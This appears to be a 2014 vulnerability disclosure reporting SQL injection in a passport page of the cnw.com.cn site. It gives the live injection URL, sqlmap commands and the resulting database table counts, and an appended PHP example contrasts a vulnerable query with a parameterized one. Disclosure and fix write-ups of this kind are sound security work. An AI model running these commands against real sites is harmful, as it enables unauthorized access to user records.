Vulnerability Details

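Disclosure status:

2014-03-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-05-07: The vendor has chosen to ignore the vulnerability; details disclosed to the public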

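Brief description:

SQL injection on a 网界网 (cnw.com.cn) subsite (over a hundred thousand user records)

Detailed description:

Injection point: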

http://passport.cnw.com.cn/findusername.php?username=crtest1



The username parameter is vulnerable to SQL injection.

Proof of vulnerability:

sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --dbs --current-user --current-db




sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --count



+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| userauditlogs | 264429 |
| users | 128142 |
| users2 | 127382 |
| laiyuan | 30618 |
| bjjt_login | 20666 |
| xdd_answer | 19526 |
| bjjt_dc | 14017 |
| sg_qdetial | 13698 |
| rel_usermail | 9077 |
| rel_usermail_20131206 | 8858 |
| sg_role | 4055 |
| t4 | 2862 |
| bjjt_reg | 1643 |
| urlvisitrecords | 1332 |
| intel121112 | 819 |
| bjjt1 | 649 |
| t3 | 275 |
| t1 | 184 |
| unsub_fb | 162 |
| sg1 | 138 |
| informatica | 101 |
| rel_othermail | 54 |
| sg_que | 45 |
| wy_industry | 35 |
| wy_duty | 20 |
| sg_roleitem | 18 |
| bjjtcourse | 15 |
| murlinfos | 12 |
| mailtypes | 10 |
| wy_companysize | 7 |
| wy_Turnover | 7 |
| sg_final_fight | 6 |
| wy_Pcsize | 6 |
| wy_serversize | 6 |
| bjjtcoursecate | 2 |
| bjjtadmin | 1 |
| sg_num | 1 |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 959 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| TABLES | 76 |
| STATISTICS | 69 |
| KEY_COLUMN_USAGE | 54 |
| TABLE_CONSTRAINTS | 54 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 30 |
| SCHEMATA | 4 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+

Database: ccw_passport
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| users | 19 |
+---------------------------------------+---------+

Database: cnwprojects
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| answer2 | 9665739 |
| answer | 32107 |
| users | 3573 |
| 20090609_cisco | 2055 |
| 20090605_ibm | 867 |
| news_content | 461 |
| 20090424_juniper | 447 |
| 20090311_symantec_records | 403 |
| 20090608_arrayamp | 235 |
| 20090309_symantec | 97 |
| question | 97 |
| newsletter | 26 |
| 20090506_novell | 15 |
| manswer | 13 |
| project | 12 |
| fuzeren | 8 |
| mquestion | 6 |
| meeting | 5 |
| musers | 2 |
+---------------------------------------+---------+

Fix:

Security testing only; absolutely no data was dumped :)
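
As an added illustration (not part of the original report, and not the site's code, which is not public): the flaw class reported for the username parameter, shown as a concatenated lookup beside a parameterized one. The users table, its columns, the function names and the in-memory SQLite database are hypothetical stand-ins.

```php
<?php
// Added illustration: the real findusername.php source is not public.
// Table and column names (users, username, email) are hypothetical.
declare(strict_types=1);

// Constructed sample data in an in-memory SQLite database so the script runs offline.
function demoDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, email TEXT)');
    $db->exec("INSERT INTO users VALUES ('crtest1', 'a@example.com'), ('alice', 'b@example.com')");
    return $db;
}

// Vulnerable pattern: request input is concatenated into the SQL text,
// so a quote in the value changes the structure of the statement.
function findUserUnsafe(PDO $db, string $username): array {
    $sql = "SELECT username FROM users WHERE username = '" . $username . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: allow-list the format, then bind the value as a parameter
// so it is only ever treated as data.
function findUserSafe(PDO $db, string $username): array {
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $username)) {
        return [];  // reject anything that is not a plausible account name
    }
    $stmt = $db->prepare('SELECT username FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = demoDb();
$probe = "x' OR '1'='1";  // constructed input containing a quote
printf("unsafe lookup, quoted input: %d row(s)\n", count(findUserUnsafe($db, $probe)));
printf("safe lookup, quoted input:   %d row(s)\n", count(findUserSafe($db, $probe)));
printf("safe lookup, valid name:     %d row(s)\n", count(findUserSafe($db, 'crtest1')));
```

If the backend is MySQL (an assumption), also set PDO::ATTR_EMULATE_PREPARES to false so the driver uses server-side prepared statements. The row counts above span several databases, so restricting the application's database account to the single schema it needs limits the reach of any injection that remains.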

Copyright notice: please credit the source when reposting: 超威蓝猫@乌云


Vulnerability Response

Vendor response:

Unable to contact the vendor, or the vendor actively refused


Vulnerability evaluation: